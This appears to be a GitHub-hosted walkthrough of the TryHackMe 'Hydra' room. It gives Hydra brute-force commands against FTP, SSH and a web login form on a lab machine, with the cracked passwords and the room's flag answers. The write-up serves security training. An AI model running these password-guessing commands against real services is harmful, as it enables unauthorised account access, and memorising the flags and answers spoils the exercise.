-
Notifications
You must be signed in to change notification settings - Fork 0
/
hydra
52 lines (34 loc) · 2.16 KB
/
hydra
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
Hydra Commands
The options we pass into Hydra depends on which service (protocol) we're attacking. For example if we wanted to bruteforce FTP with the username being user and a password list being passlist.txt, we'd use the following command:
hydra -l user -P passlist.txt ftp://10.10.48.233
For the purpose of this deployed machine, here are the commands to use Hydra on SSH and a web form (POST method).
SSH
hydra -l <username> -P <full path to pass> 10.10.48.233 -t 4 ssh
Post Web Form
We can use Hydra to bruteforce web forms too, you will have to make sure you know which type of request its making - a GET or POST methods are normally used. You can use your browsers network tab (in developer tools) to see the request types, or simply view the source code.
Below is an example Hydra command to brute force a POST login form:
hydra -l <username> -P <wordlist> 10.10.48.233 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
#Task 2 Using Hydra
- Use Hydra to bruteforce molly's web password. What is flag 1?
hint:
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.48.233 http-post-form "/login:username=^USER^&password=^PASS^:Your username or password is incorrect."
or hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.48.233 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
.....
[80][http-post-form] host: 10.10.48.233 login: molly password: sunshine
THM{2673a7dd116de68e85c48ec0b1f2612e}
- Use Hydra to bruteforce molly's SSH password. What is flag 2?
hint: hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.48.233 ssh
....
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.48.233:22/
[22][ssh] host: 10.10.48.233 login: molly password: butterfly
1 of 1 target successfully completed, 1 valid password found
...
ssh molly@
cat flag2.txt
THM{c8eeb0468febbadea859baeb33b2541b}
https://tryhackme.com/room/hydra
https://dev.to/applegamer22/tryhackme-hydra-42j3
https://www.thedutchhacker.com/hydra/
https://github.com/pamhrituc/TryHackMe_Writeups/blob/master/writeups/Hydra.md
https://github.com/pamhrituc/TryHackMe_Writeups